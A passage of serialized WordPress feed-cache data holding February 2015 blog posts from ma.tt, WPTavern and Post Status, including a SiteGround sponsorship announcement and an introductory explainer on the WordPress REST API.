culture</strong> there, from billboards to services like Uber or <a href=\"https://postmates.com/\">Postmates</a> (or <a href=\"https://munchery.com/\">Munchery</a> or <a href=\"https://www.spoonrocket.com/\">Spoonrocket</a>) that today seem like conveniences, but will be the basis of something very meaningful down the line. You can feel like you’re living in the future there. Internet speeds seem to be getting better, too — local ISPs like <a href=\"https://webpass.net/\">Webpass</a> and <a href=\"https://www.monkeybrains.net/\">Monkeybrains</a> are leading the way, but even my Comcast account there delivers 120mbps.</p>\n<p>I miss being able to run along the water, and the close proximity to lots of beautiful nature areas (granted I didn’t take much advantage of those when I was still around). The quality of light is really nice — when you can see it. Restaurants, though tending toward pricey, offer great ingredients and quality.</p>\n<p>Finally, you can’t deny it’s a city of hustlers. This tweet has since been deleted, but you get the idea:</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/photomatt\">@photomatt</a> Can we interest you in any lemonade? Or what about a quick meeting at <a href=\"https://twitter.com/CoupaCafe\">@CoupaCafe</a> in <a href=\"https://twitter.com/hashtag/paloalto?src=hash\">#paloalto</a> <a href=\"http://t.co/ExoxtXHu38\">pic.twitter.com/ExoxtXHu38</a></p>\n<p>— Closetclicks (@closetclicks) <a href=\"https://twitter.com/closetclicks/statuses/500345852352008193\">August 15, 2014</a></p></blockquote>\n<p></p>\n<p><img class=\"wp-image-44687 size-full\" src=\"http://i0.wp.com/ma.tt/files/2015/02/closetclicks_2015-Feb-11.jpg?resize=604%2C453\" alt=\"\" /></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Feb 2015 20:10:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: SiteGround Sponsors a Full-Time Contributor to WordPress Core\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38870\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/siteground-sponsors-a-full-time-contributor-to-wordpress-core\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4217:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/siteground-offices.jpg\" rel=\"prettyphoto[38870]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/siteground-offices.jpg?resize=720%2C352\" alt=\"siteground-offices\" class=\"aligncenter size-full wp-image-38896\" /></a></p>\n<p><a href=\"https://profiles.wordpress.org/iseulde\" target=\"_blank\">Iseulde Van Dorpe</a> is joining <a href=\"https://www.siteground.com/\" target=\"_blank\">SiteGround</a> to work full-time as a contributor to WordPress core. She expects to work on a variety of different tasks, particularly those that relate to media and the editing experience. Van Dorpe’s recent core contributions helped to improve the editor for users in the 4.0 release.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>There are many WordPress 4.0 standouts, but <a href=\"https://twitter.com/avryl\">@avryl</a> took my editor sizing/scrolling idea and ran with it. Turned it into something *magical*.</p>\n<p>— Mark Jaquith (@markjaquith) <a href=\"https://twitter.com/markjaquith/status/507580649536880640\">September 4, 2014</a></p></blockquote>\n<p></p>\n<p>SiteGround identified and selected its new contributor based on recommendations from others involved in core development. “In search of developing our WordPress involvement even further, we made some inquiries as to what is most needed by the project at the moment,” said Tina Kesova, VP of Strategic Partnerships at SiteGround.</p>\n<p>“The answer we received was that front-end and Javascript specialists will be very valuable. A recommendation for Iseulde’s work in this field was also received from several key WordPress people, who have been impressed with the things she has done for the last year since she first started contributing on a volunteer basis,” she said.</p>\n<p>For the past five years, SiteGround has been actively involved with supporting the project by sponsoring community events, dedicating employees to help with event orgranization, and sending speakers to share their knowledge at WordCamps around the world.</p>\n<p>“We also already have a great relationship with Mario Peshev, who is contributing to the core on a part-time basis sponsored by our company,” Kesova said. This experience helped with the company’s decision to sponsor Van Dorpe as a full-time contributor.</p>\n<p>“What truly won us after we had personally met her, was that she is not just a capable WordPress developer, but she is also a great fit for our company culture,” Kesova said. “She has the same passion for quality and efficiency that drives SiteGround.”</p>\n<h3>What does a full-time WordPress core contributor do?</h3>\n<p>SiteGround isn’t the first hosting company to sponsor an employee’s time for working on the WordPress project. WP Engine, Dreamhost, and a handful of others have been doing so for the past several years. The job varies, depending on the amount of time the company can lend and the contributor’s areas of specialty and interest.</p>\n<p>“As part of the SiteGround team Iseulde will be working full time contributing to WordPress core and helping with some maintenance tasks,” Kesova said. “She has some great ideas about improvements in the WordPress backend, including the editor and the media manager, and she will be also doing some support work for WordPress by reviewing and closing tickets and patches.”</p>\n<p>Van Dorpe, originally from Belgium, will be working remotely from her current home in Glasgow, Scotland. SiteGround’s main headquarters are in Sofia, Bulgaria, but it also has two offices in Bulgaria and one in Spain. The company is in the process of hiring its first American employee and plans to open an office in the USA soon.</p>\n<p>“As a web hosting company, we are aware of the big significance open source projects like WordPress have for our business, by helping people build their websites on top of the hosting service we provide,” Kesova said. “That is why we believe it is our duty to support such projects in a meaningful way that can help further their development.”</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 Feb 2015 18:55:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Post Status: The WordPress REST API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8643\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://poststatus.com/wordpress-json-rest-api/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:22527:\"<p>The WordPress REST API project is the most exciting project for the platform since custom post types were introduced in WordPress 2.9 and 3.0. I really believe that.</p>\n<p>While the project is under a major rewrite and not yet slated for a specific core release, it can be really confusing to figure out what’s going on.</p>\n<p>Let’s talk about what the new API is, why it matters, and go over the state of the API to answer some common questions I’ve seen.</p>\n<h3>What is a JSON REST API?</h3>\n<p>Let’s start by defining the acronyms. It may seem tedious for experienced developers, but it’s a good way to get us in the right mindset.</p>\n<h4>API: Application Program Interface</h4>\n<p>APIs have a broad definition. Any program is an API. When you have some form of construct in a programming language — like PHP for example — where the construct makes it possible to perform a programming task, that’s a good way to think of an API.</p>\n<p>Let’s use custom post types as an example. WordPress has a custom post types API. Really, it’s just a significant chunk of code that makes previously difficult tasks simpler. Now, you can create all new types of content — that mimic the content structure for posts and pages — with just a few lines of code.</p>\n<p>The core team created a programming interface to make that possible. That’s a layman’s definition for an API.</p>\n<h4>JSON: JavaScript Object Notation</h4>\n<p>JSON is a preferred format for structuring data so that a variety of applications can read it. You can create JSON formatted data from one programming language and read and process it from another. It’s similar to XML, but seemingly universally preferred over XML.</p>\n<p>JSON makes communication between something like WordPress and something like a mobile app completely possible, as JSON is a common data format between them, so that you can create data on the WordPress side and return it in JSON, so that the data can be easily read on the mobile app side. Such relationships don’t have to be between WordPress and a mobile app; it could be nearly anything, meaning “WordPress as an app platform” becomes much more realistic.</p>\n<div id=\"attachment_8687\" class=\"wp-caption aligncenter\"><img class=\"size-large wp-image-8687\" src=\"https://poststatus.com/wp-content/uploads/2015/02/json-api-data-752x460.jpg\" alt=\"A JSON blurb, at least how it looks when you go straight to the URL\" width=\"752\" height=\"460\" /><p class=\"wp-caption-text\">A JSON blurb, at least how it looks when you go straight to the URL</p></div>\n<p>JSON looks terrifying if you see it “raw”. For instance, Post Status has the WordPress REST API enabled, so if you go to <a href=\"https://poststatus.com/wp-json/posts\">https://poststatus.com/wp-json/posts</a> you can see my recent posts in a JSON format. This isn’t pretty to the human eye, but for a programming language, it’s beautiful.</p>\n<h4>REST: Representational State Transfer</h4>\n<p>A REST API is an architectural preference. Most REST APIs, including WordPress’, are based on HTTP. This means that the primary actions of the REST API are HTTP actions: <code>POST</code>, <code>GET</code>, <code>PUT</code>, <code>DELETE</code>.</p>\n<p>So, with a REST API, we are reading or manipulating data using HTTP.</p>\n<p>Wikipedia kindly defines RESTful APIs better than I can, namely with a definition based upon the restraints on the API itself:</p>\n<blockquote><p>Web service APIs that adhere to the <a href=\"http://en.wikipedia.org/wiki/Representational_state_transfer#Architectural_constraints\">REST architectural constraints</a> are called RESTful. HTTP based RESTful APIs are defined with these aspects:</p>\n<ul>\n<li>base <a class=\"mw-redirect\" title=\"URI\" href=\"http://en.wikipedia.org/wiki/URI\">URI</a>, such as <code>http://example.com/resources/</code></li>\n<li>an <a title=\"Internet media type\" href=\"http://en.wikipedia.org/wiki/Internet_media_type\">Internet media type</a> for the data. This is often <a title=\"JSON\" href=\"http://en.wikipedia.org/wiki/JSON\">JSON</a> but can be any other valid Internet media type (e.g. XML, Atom, microformats, images, etc.)</li>\n<li>standard <a class=\"mw-redirect\" title=\"HTTP method\" href=\"http://en.wikipedia.org/wiki/HTTP_method\">HTTP methods</a> (e.g., GET, PUT, POST, or DELETE)</li>\n<li>hypertext links to reference state</li>\n<li>hypertext links to reference related resources<sup id=\"cite_ref-8\" class=\"reference\"><a href=\"http://en.wikipedia.org/wiki/Representational_state_transfer#cite_note-8\">[8]</a></sup></li>\n</ul>\n</blockquote>\n<p>These restrictions serve as standards that anyone working with a RESTful API can expect to exist. So, in my case, I’m utilizing both the WP API and the Mailchimp API on Post Status. Interacting with either feels similar, because they’ve placed similar constraints on themselves.</p>\n<h3>What is the WordPress REST API?</h3>\n<p>Now we know what a JSON REST API is, so we can better define what the WordPress one is.</p>\n<p><span class=\"pullquote alignright\">The WordPress REST API is a common data and programming interface that abstracts the reading and writing of information for WordPress from the WordPress application as we’ve previously known it.</span> Now, developers working with WordPress don’t have to know that much about WordPress.</p>\n<h3>How can the WordPress REST API be used?</h3>\n<p>Developers will be able to perform nearly all the data manipulation and data reading functions that are possible with PHP, with the new API. What’s that mean? It means everything.</p>\n<h4>Ditching WordPress on the front-end</h4>\n<p>With the JSON API, the frontend of WordPress doesn’t have to be WordPress at all. For example, developers can completely bypass the WordPress templating engine using the API. They can even keep the backend of WordPress and the front-end of the website on completely different server stacks, because they just need to read the data using the API.</p>\n<p>There are already many websites doing this around the web. Some of them use custom APIs they built themselves, and others are using the new WordPress REST API. Let’s discuss a couple of examples:</p>\n<ol>\n<li>The New York Times uses the WordPress REST API for a variety of things. They are able to use the API in combination with their proprietary CMS. This allows them to pull WordPress data for placement on the Times’ homepage and other places very easily. They’re also using the REST API for their live event coverage, like this <a href=\"http://elections.nytimes.com/2014/liveblog\">elections live blog</a>.</li>\n<li><a href=\"http://www.bloomberg.com/politics/\">Bloomberg Politics</a> uses WordPress to publish, but based on the front-end of the website, you’d never know it. I don’t think they’re using the official WordPress REST API, but they could.</li>\n<li><a href=\"http://mashable.com/\">Mashable</a> uses WordPress to publish, but their front-end is not WordPress at all. This is also a custom implementation, as they made the switch before the official REST API was even underway.</li>\n</ol>\n<p>These are three examples of news sites using REST APIs for the front-end. But the applications go much, much farther than that.</p>\n<h4>WordPress as an application</h4>\n<p>If you want to see a prime case study, watch K. Adam White’s presentation from WordCamp San Francisco 2014, where he talks about <a href=\"http://wordpress.tv/2014/11/03/k-adam-white-wordpress-in-weird-places-content-management-for-node-using-rest/\">how his team used WordPress as the CMS for a node.js app</a>. This really highlights the potential I’m talking about.</p>\n<p>Looking through the resulting <a href=\"https://github.com/kadamwhite/expresspress\">ExpressPress repo</a> that K. Adam highlights in his presentation is an educational and fascinating experience.</p>\n<h4>Custom WordPress admins</h4>\n<p>WordPress administration doesn’t have to use the WordPress admin as we know it. With the REST API, you can create, edit, and delete content just as well as you can read it.</p>\n<p>Eventually, the WordPress admin itself may be re-written on top of the REST API. Using the API, creating completely custom administration panels will be easier than ever before. This will allow developers to create catered administration experiences for a particular application.</p>\n<div id=\"attachment_8686\" class=\"wp-caption aligncenter\"><img class=\"size-large wp-image-8686\" src=\"https://poststatus.com/wp-content/uploads/2015/02/json-api-wpcom-post-editor-752x561.jpg\" alt=\"The WordPress.com editor\" width=\"752\" height=\"561\" /><p class=\"wp-caption-text\">The WordPress.com editor</p></div>\n<p>For example, WordPress.com has already utilized their own REST API (which will hopefully be a similar implementation to the core API once it’s included) to create a custom admin experience for their blogging platform.</p>\n<div id=\"attachment_8685\" class=\"wp-caption aligncenter\"><img class=\"size-large wp-image-8685\" src=\"https://poststatus.com/wp-content/uploads/2015/02/wp-api-happy-tables-752x490.jpg\" alt=\"The Happy Tables editor\" width=\"752\" height=\"490\" /><p class=\"wp-caption-text\">The Happy Tables editor</p></div>\n<p>Other services, like <a href=\"http://happytables.com\">Happy Tables</a> for instance, have also created custom WordPress admins. Doing this in the future will be easier than ever because the REST API integrates existing WordPress functionality to the API, so that developers don’t have to reinvent the wheel.</p>\n<h4>App integrations</h4>\n<p>Additionally to custom web integrations, WordPress will be able to talk to apps easier than ever before as well.</p>\n<p>Previous apps that interfaced with WordPress would most often use XML-RPC. With the REST API, the ability to perform complex functions in a reliable manner is increased. It will be simpler than ever to create a mobile app that can not only read WordPress data, but also create, edit, and delete that data.</p>\n<p>The entire mobile app can be written in Objective-C, Swift, or whatever programming language, and interface with WordPress.</p>\n<p>An example of this in action is <a href=\"http://apppresser.com/\">AppPresser</a> (<a title=\"AppPresser: A foundation for using WordPress to make mobile apps\" href=\"https://poststatus.com/appresser-wordpress-mobile-apps/\">which I covered</a> when it launched). AppPresser has created an application framework that integrates with the WordPress REST API to make creating WordPress apps for individual sites quite simple.</p>\n<p>But it’s not limited to app creation with a tool like AppPresser. People can now have one data-storage area (WordPress) that can power both the website and an app, and that is a powerful feature. Also, the apps can talk to and write to the WordPress database directly through the API.</p>\n<p>We will see dozens of WordPress apps and admin integrations over the next few years. We could even see whole startups build apps with WordPress as a base layer.</p>\n<p><span class=\"pullquote alignright\">WordPress can provide an excellent foundation for user management, content management, and much more — reducing the amount of work a startup creating a prototype mobile application have to recreate themselves.</span> The REST API makes it so a mobile app can look completely custom and also use a tool as widely distributed as WordPress to power many of the internals.</p>\n<h3>When is the WordPress REST API going to be in core?</h3>\n<p>The REST API is under heavy development, and is also between major versions that will sever backward compatibility. That has made the state of the API confusing.</p>\n<p>The REST API hasn’t been slated for a particular release, though it is officially active <a href=\"https://make.wordpress.org/core/features-as-plugins/\">for the “feature as plugin”</a> model. The goal is for it to hit core some time in 2015, so probably between WordPress 4.3 and 4.5. I’d guess closer to 4.5, as there will need to be a lot of testing once the new stable version comes out.</p>\n<h3>Keeping up with development</h3>\n<p>If you want to keep track of the WordPress REST API development, there are a variety of ways to do so, though finding the proper channels can be a challenge at the moment.</p>\n<p>First off, know that a major new version is being finalized as we speak, so there is disparity between 1.1.x and the upcoming version for information, code, and documentation. The version under development — and is a significant restructuring — has been under development for nearly seven months.</p>\n<p>The <a href=\"https://wordpress.org/plugins/json-rest-api/\">WordPress.org official plugin page</a> is somewhat closely synchronized with the latest 1.x release, though it is a few commits behind. The plugin is authored by Ryan McCue, who is the project lead and the initial author of the plugin, as it was his Google Summer of Code project for the first iteration. The WordPress.org page could also use some updating to make it more obvious that it’s the official REST API plugin for the WordPress project.</p>\n<p>The <a href=\"https://github.com/WP-API/WP-API\">WP API Github</a> is where active issue tracking, version management, and releases are being handled. The API has its own account on Github, rather than being a part of the WordPress account, as there are adjacent repos to the actual API and it wasn’t originally guaranteed to be in core.</p>\n<p>The key to understanding the various states of the WP REST API is to think in terms of <strong>Develop</strong>, <strong>Master</strong>, and <strong>Stable</strong> versions.</p>\n<ul>\n<li><a href=\"https://wordpress.org/plugins/json-rest-api/\">WordPress.org plugin repository</a> is the Stable version of the WP API.</li>\n<li><a href=\"https://github.com/WP-API/WP-API/tree/master\">Github Master branch</a> is where a Beta version of the next release is managed.</li>\n<li><a href=\"https://github.com/WP-API/WP-API/tree/develop\">Github Develop branch</a> is where the active development occurs.</li>\n</ul>\n<p><strong>If you’re using the WordPress REST API in production, you should use the WordPress.org version only</strong>. The Github Master and Development versions should be used for development and testing only.</p>\n<h3>Improvements coming in the rewrite</h3>\n<p>The long development cycle for the new version of the REST API is because it’s a signifcant rewrite for the project.</p>\n<p>Based on feedback and real-world use cases, the team was able to identify necessary improvements that needed to happen.</p>\n<p>There have been many, many changes in this version, but a couple of big ones are as follows:</p>\n<ul>\n<li>New functions have been added to allow for registration of custom endpoints with namespaces and versions. Rachel Baker <a href=\"https://gist.github.com/krogsgard/c3975a2ff449f20e56f3\">shared this gist with me</a> that showcases that. This means themes and plugins will be able to add to and extend the API, offering significantly more power to it.</li>\n<li>Comment creation and edit handling have been added in the rewrite.</li>\n<li>The team has also started work on support for options endpoints to be able to view, edit, and create general site options, which would make complete site management possible with the API, in addition to content management.</li>\n</ul>\n<p>The changes in the current development cycle have taken a long time, and have required some significant architectural changes, but are very much worth the long term benefits.</p>\n<h3>Contributors to the WordPress REST API</h3>\n<p>There have been <a href=\"https://github.com/WP-API/WP-API/graphs/contributors\">49 code contributors</a> to the REST API project on Github. It’s already a huge community effort. However, there are some folks that are really driving the project forward.</p>\n<p><img class=\"aligncenter size-large wp-image-8684\" src=\"https://poststatus.com/wp-content/uploads/2015/02/wp-api-contributors-752x484.png\" alt=\"wp-api-contributors\" width=\"752\" height=\"484\" /></p>\n<ul>\n<li><a href=\"https://twitter.com/rmccue\">Ryan McCue</a>: Ryan is the overall project lead, and is generally steering the ship. This all started as his GSoC (Google Summer of Code) project and he is still the lead. He works for <a href=\"http://hmn.md/\">Human Made</a>, primarily on Happy Tables.</li>\n<li><a href=\"https://twitter.com/rachelbaker\">Rachel Baker</a>: Rachel is a project lead, and is doing a great deal of development, as well as education and evangelism. She works for <a href=\"http://10up.com\">10up</a> as a Senior Web Engineer.</li>\n<li><a href=\"https://twitter.com/danielbachhuber\">Daniel Bachhuber</a>: Daniel is in day to day conversations and also commits a lot of code to the project. He works for himself and is the interim engineering director at <a href=\"http://fusion.net/\">Fusion</a>.</li>\n<li><a href=\"https://twitter.com/joe_hoyle\">Joe Hoyle</a>: Joe is in day to day conversations and also commits a lot of code to the project. He is a co-founder of <a href=\"http://hmn.md/\">Human Made</a>.</li>\n</ul>\n<p>Though I highlight these four contributors, but there are a whopping 400 people watching the #core-restapi channel in Slack, and there are 49 code contributors on Github. Everyone deserves a huge round of applause that’s taken part in the strategic, code, education aspects of this project.</p>\n<p>And this is all before it goes into the core development cycle. Once this gets slated for a specific release, it’s going to get an insane amount of attention to make sure it’s ready for prime time and the millions of WordPress installs out there.</p>\n<h3>Meetings and blogs for the REST API</h3>\n<p>The REST API has a standing channel and weekly meeting in WordPress Slack, as well as two blogs you can keep track of:</p>\n<ul>\n<li>#core-restapi on WordPress Slack is where day to day communication occurs, and a feed of commit activity also goes into that channel. The weekly meeting is also here — and is actually held twice per week — at 23:00 UTC on Mondays and Wednesdays.</li>\n<li>The <a href=\"https://make.wordpress.org/core/tag/json-api/\">json-api tag on Make WordPress Core</a> is where blog posts about the API go. However, this has been rarely used, and is primarily just for release information.</li>\n<li>Frequent meeting notes and other discussions are posted on <a href=\"http://make.wp-api.org/\">make.wp-api.org</a>, which is an 02 blog (P2’s mysterious successor).</li>\n<li>Documentation can be viewed on <a href=\"http://wp-api.org\">wp-api.org</a>. It’s important to keep in mind that <strong>the docs on the main website are for the stable WordPress plugin</strong>, not the Develop branch.</li>\n</ul>\n<h3>Basics for using the WordPress REST API</h3>\n<p>The new API will make sense to people familiar with other REST APIs. However, if you are new to such things, even with the documentation you can easily get lost. I know I did.</p>\n<p>I will have a lot more resources for members soon, but I’ll try and give a quick intro to reading data now.</p>\n<p>The first thing to remember is that it’s very important to know if you will be reading data only or reading and changing data. If you are reading data from your own website, and using it on the same website, you don’t need to worry about authentication. If you are changing, adding, or deleting data, then you need to authenticate with the website you are making changes to.</p>\n<p>Let’s show a few simple examples of reading data with <code>GET</code>.</p>\n<p>A URL to pull content from Post Status would look like this:</p>\n<a href=\"https://gist.github.com/c983960972582c6ec2c0\" target=\"_blank\"><em>View this code snippet on GitHub.</em></a>\n<p>To pull content with <code>WP_Query</code> parameters you’re used to, you could do it like this:</p>\n<a href=\"https://gist.github.com/c983960972582c6ec2c0\" target=\"_blank\"><em>View this code snippet on GitHub.</em></a>\n<p>To pull content of a custom post type, you can do it like this:</p>\n<a href=\"https://gist.github.com/c983960972582c6ec2c0\" target=\"_blank\"><em>View this code snippet on GitHub.</em></a>\n<p>And to pull content of a custom post type with those same <code>WP_Query</code> parameters, it looks like this:</p>\n<a href=\"https://gist.github.com/c983960972582c6ec2c0\" target=\"_blank\"><em>View this code snippet on GitHub.</em></a>\n<p>What you see returned in those URLs is the JSON data we’re going after. Go ahead and put one of those URLs in a browser tab to see the return data.</p>\n<p>You can see how the method for grabbing that data feels familiar to using <code>WP_Query</code> for a standard WordPress loop. If you don’t specify a parameter, the defaults to <code>WP_Query</code> will be used.</p>\n<p>These URLs return that data, but obviously you’ll want to get that data programatically. You can do this within a WordPress install (or outside) with two common methods: PHP or AJAX.</p>\n<p>Handling the data will be similar to handling any other JSON data. I’ll have more on doing this with WordPress at a later date, but in the meantime you may enjoy <a href=\"http://torquemag.io/introduction-wordpress-new-universal-connector-json-rest-api/\">Josh Pollock’s introduction</a> to using the REST API.</p>\n<p>Now, of course, you can query far more than posts, as the <a href=\"http://wp-api.org\">WP API website</a> notes, but I just wanted to introduce the concepts.</p>\n<p>The API allows you to manage pretty much anything: posts, pages, custom post types, users, media, taxonomies, or even overall site data.</p>\n<h3>This is just the beginning</h3>\n<p>Unfortunately, I’ve hardly given a proper introduction to actually using the new WordPress REST API. That will have to wait until another time. That said, you should know have a pretty good understanding of what this project is, what it means for WordPress, and where to go to get started with the new API.</p>\n<p>I highly encourage you to educate yourself on this API, as well as experiment with it. You can use the Stable branch in production projects (like I do here on Post Status), but it would be really great to get more people testing and using the API in general so that when it ships with WordPress it will be as good as it can be.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Feb 2015 22:31:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Matt: Amazing Dance\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44669\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"http://ma.tt/2015/02/amazing-dance/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:183:\"<p></p>\n<p>Incredible music (“Take Me To Church” by Hozier), incredible artist (the dancer, Sergei Polunin), and incredible photographer / director (David LaChapelle).</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Feb 2015 19:08:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"WPTavern: Tackling the Issue of WordPress Derivative Works\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38822\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://wptavern.com/tackling-the-issue-of-wordpress-derivative-works\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6882:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/06/GPLFeaturedImage.png\" rel=\"prettyphoto[38822]\"><img class=\"size-full wp-image-24825\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/06/GPLFeaturedImage.png?resize=639%2C200\" alt=\"GPL License Plate Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/benfrantzdale/170212544/\">BenFrantzDale</a> – <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a>\n<p>In 2009-10, there <a title=\"http://wordpress.tv/2010/07/15/mixergy-interview-pearson-mullenweg/\" href=\"http://wordpress.tv/2010/07/15/mixergy-interview-pearson-mullenweg/\">was an intense debate</a> between the co-creator of WordPress, Matt Mullenweg, and the founder of DIY Themes, Chris Pearson. The debate centered on whether or not Thesis needed to be 100% GPL licensed. Thesis lifted lines of code from the core of WordPress, which <a title=\"https://markjaquith.wordpress.com/2010/07/17/why-wordpress-themes-are-derivative-of-wordpress/\" href=\"https://markjaquith.wordpress.com/2010/07/17/why-wordpress-themes-are-derivative-of-wordpress/\">some people claimed</a> made Thesis a derivative of WordPress. Pearson disagreed 